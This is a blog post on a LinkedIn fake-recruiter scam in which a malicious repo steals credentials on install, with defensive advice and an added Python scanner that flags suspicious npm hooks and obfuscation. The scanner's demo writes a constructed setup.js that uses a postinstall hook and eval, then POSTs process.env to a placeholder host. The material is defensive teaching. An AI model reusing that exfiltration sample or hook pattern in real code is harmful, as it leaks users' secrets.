In the last 3 months I’ve been targeted twice by a relatively sophisticated scam on LinkedIn. What follows is a short description of the pattern and some common sense steps you can take to avoid leaking your credentials.
The LinkedIn Scam Pattern
Both attempts started with a direct message from a recruiter. The first thing I do when I get a cold message is look at the sender’s LinkedIn history. Here are some red flags:
- recent account but with hundreds/thousands of followers (likely bots)
- very little publishing history (not much posting or commenting)
- inconsistent work history (random companies stitched together for credibility)
Both these accounts were in good shape, which suggests they started out as legitimate accounts that were later compromised. The rightful owners either didn’t notice or didn’t report the takeover, so LinkedIn never blocked the accounts. In other words, somebody was first scammed out of their LinkedIn account, and that account was then operated by the perpetrators. That was step 1.
Step 2 involves a proposal that looks slightly better than the market rate, but still credible. Both scams pretended to have a project in the works, something very common, not a bright idea, just a project. I asked a few questions about the company, and the answers were again credible. It’s worth noting that both attempts were conducted in perfect English. So, step 2 is getting you to engage with the proposal.
Step 3, where everything happens, is setting up a meeting and offering some materials in preparation for the meeting. The meeting was set up via a legit Calendly link. The prepping materials came in the form of a BitBucket repo, which I was supposed to download and install so we could chat about the existing features.
From here on, things would go like this:
- you clone the repo
- you install dependencies
- you add .env variables (the repo has calls to various APIs that require private keys)
- you run the code
- ka-boom – your credentials are gone in less than a second, because you just launched a backdoor
But it doesn’t have to be like this.
Common Sense Protection Measures
Both times I asked one of my agents to scan the repo on the remote site (without installing it). ChatGPT and Claude are really good at these things if you prompt them well. The first time, ChatGPT found it just by listing the files in the repo; the second time, I installed the repo and Claude found the exact point where the exfiltration was taking place and described the mechanism in detail.
Here are a few basic, common sense protection measures:
- ask many questions about the company first, and look for these red flags: a fully remote team (no physical location), vague information about funding (the company doesn’t actually exist), and a vague or very short history of the team
- share as little information as possible during the messaging (ideally only what’s already in your LinkedIn profile, not more)
- when you get a meeting proposal, make sure you use legit apps (no custom video conferencing platforms, vanilla Calendly setup)
- when you get a repo, scan it first. I cannot emphasize this enough: do NOT run random repos on your machine without scanning them first. It’s just a matter of asking your favorite LLM to identify security holes, and telling it to look for obfuscated code, suspicious npm/pip packages, and unusual postinstall scripts
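As an added example (not from the original post, and not the tooling the author used), here is a deterministic first pass you can run over a fresh clone before `npm install`, and before asking an LLM for a deeper read. It flags the three things the post tells you to look for: npm lifecycle hooks (which run during install, before you ever "run the code"), common obfuscation constructs, and code that reads the whole environment and makes an outbound request, which is the exfiltration shape described above. The regexes are heuristics I chose for this example, the sample repo it writes to a temp directory is constructed, and `example.invalid` is a placeholder host.

```python
"""Static triage of a cloned repo before running it (added example, not the post's code)."""
import json
import os
import re
import tempfile
from pathlib import Path

# npm runs these automatically on `npm install`, before you ever "run the code".
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics, not proof: a hit means "read this file", not "this is malware".
SUSPICIOUS_PATTERNS = {
    "eval_or_function": re.compile(r"\b(eval|new Function)\s*\("),
    "base64_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\s*\("),
    "long_encoded_blob": re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]"),
    "child_process": re.compile(r"require\(['\"]child_process['\"]\)|\bexecSync\s*\("),
    "env_dump": re.compile(r"JSON\.stringify\(\s*process\.env\s*\)|readFileSync\([^)]*\.env"),
    "outbound_http": re.compile(r"\b(fetch|https?\.request|axios\.(post|get))\s*\("),
}
SKIP_DIRS = {"node_modules", ".git", "dist", "build"}
CODE_EXT = {".js", ".cjs", ".mjs", ".ts"}


def scan_package_json(path):
    """Return (location, finding) tuples for lifecycle hooks in package.json."""
    try:
        scripts = json.loads(path.read_text()).get("scripts", {})
    except (json.JSONDecodeError, OSError):
        return [(str(path), "unparseable package.json")]
    return [(str(path), f"lifecycle hook '{hook}': {scripts[hook]}")
            for hook in LIFECYCLE_HOOKS if hook in scripts]


def scan_source(path):
    """Return (location, finding) tuples for suspicious constructs in one file."""
    text = path.read_text(errors="replace")
    findings = []
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        for match in pattern.finditer(text):
            line = text.count("\n", 0, match.start()) + 1
            findings.append((f"{path}:{line}", name))
    kinds = {kind for _, kind in findings}
    # Reading every secret and making an outbound request in the same file
    # is the exfiltration shape the post describes; flag the combination.
    if {"env_dump", "outbound_http"} <= kinds:
        findings.append((str(path), "env_exfil_combo"))
    return findings


def triage_repo(root):
    """Walk a checkout and collect findings; run this before `npm install`."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for filename in filenames:
            path = Path(dirpath) / filename
            if filename == "package.json":
                findings.extend(scan_package_json(path))
            elif path.suffix in CODE_EXT:
                findings.extend(scan_source(path))
    return findings


def build_sample_repo():
    """Write a constructed sample repo: a harmless index.js plus a bad setup.js."""
    root = Path(tempfile.mkdtemp(prefix="triage-demo-"))
    (root / "package.json").write_text(json.dumps({
        "name": "demo-project",
        "scripts": {"start": "node index.js", "postinstall": "node setup.js"},
    }))
    (root / "index.js").write_text(
        'const key = process.env.API_KEY;\n'
        'console.log("would call the API with", key ? "a key" : "no key");\n'
    )
    blob = "QUJD" * 40  # constructed stand-in for an encoded second stage
    (root / "setup.js").write_text(
        f'const blob = "{blob}";\n'
        'const stage2 = Buffer.from(blob, "base64").toString();\n'
        'eval(stage2);\n'
        'const secrets = JSON.stringify(process.env);\n'
        'fetch("https://example.invalid/collect", { method: "POST", body: secrets });\n'
    )
    return root


if __name__ == "__main__":
    for location, finding in triage_repo(build_sample_repo()):
        print(f"{finding:24} {location}")
```

Point `triage_repo()` at a real clone instead of the sample to use it. Every hit is a place to read by hand; a `postinstall` hook that runs a script you have not read is reason enough not to install, and the `env_exfil_combo` finding is the exact pattern that empties your `.env` the moment the code runs.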
The Boundaries Are Fading Away
AI is advancing at an incredible speed. Humans, not so much. The proportion of scammers to legit people is pretty much the same, but AI is making the boundary between good and bad guys almost invisible. The disguise is cheap and very effective. That’s one of the reasons your main behavior online should be “don’t trust, verify”.
We’ve been heading for this inflection point very slowly during the last 5-10 years. I know, because I was studying machine learning before ChatGPT was cool, and back then it was still very difficult to mirror reality the way AI is mirroring it right now. Now we’re there. We’re in the middle of an AI generated fantasy world, where it’s almost impossible to find your way out, almost impossible to tell what’s fabricated from what’s real.
That’s why – and I will say this over and over – bio content, or provably human generated content, will not only become more precious, but will eventually aggregate into the foundation of a new, trustworthy world, separating itself from the Matrix.